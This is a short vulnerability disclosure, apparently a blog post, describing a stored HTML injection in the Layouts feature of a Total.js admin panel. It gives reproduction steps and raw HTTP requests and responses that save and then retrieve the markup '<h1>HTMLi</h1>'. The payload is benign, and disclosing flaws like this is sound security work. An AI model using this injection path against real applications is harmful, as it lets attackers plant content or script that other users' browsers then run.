Description
- It was noted that the "Layout" functionality was vulnerable to Stored HTML Injection
Stored HTML Injection - Layout Functionality
Steps to Reproduce:
- Login with user and visit "Layouts"
- Click on "Create" and enter name for the layout
- Trap the HTTP POST request and in the "html" parameter value enter the Stored HTML Injection payload below
- Upon visiting the newly created layout the payload would execute
<h1>HTMLi</h1>
// HTTP POST Request - Creating New Layout
POST /admin/ HTTP/1.1
Host: 192.168.58.153
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:145.0) Gecko/20100101 Firefox/145.0
[...]
{"schema":"layouts_save","data":{"name":"xss-test-layout-name-test","html":"<h1>HTMLi</h1>"}}
// HTTP POST Response - Creating New Layout
HTTP/1.1 200 OK
content-type: application/json; charset=utf-8
cache-control: private, no-cache, no-store, max-age=0
vary: Accept-Encoding, Last-Modified, User-Agent
expires: -1
x-powered-by: Total.js
Date: Sun, 26 Oct 2025 16:41:53 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Content-Length: 39
{"success":true,"value":"JE6c9M1cB61f"}
// HTTP GET Request - Triggering the Payload
POST /admin/ HTTP/1.1
Host: 192.168.58.153
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:145.0) Gecko/20100101 Firefox/145.0
[...]
{"schema":"layouts_html","data":{"id":"JE6c9M1cB61f"}}
// HTTP GET Response - Triggering the Payload
HTTP/1.1 200 OK
content-type: application/json; charset=utf-8
cache-control: private, no-cache, no-store, max-age=0
vary: Accept-Encoding, Last-Modified, User-Agent
expires: -1
x-powered-by: Total.js
Date: Sun, 26 Oct 2025 16:46:18 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Content-Length: 60
{"name":"xss-test-layout-name-test","html":"<h1>HTMLi</h1>"}
No comments:
Post a Comment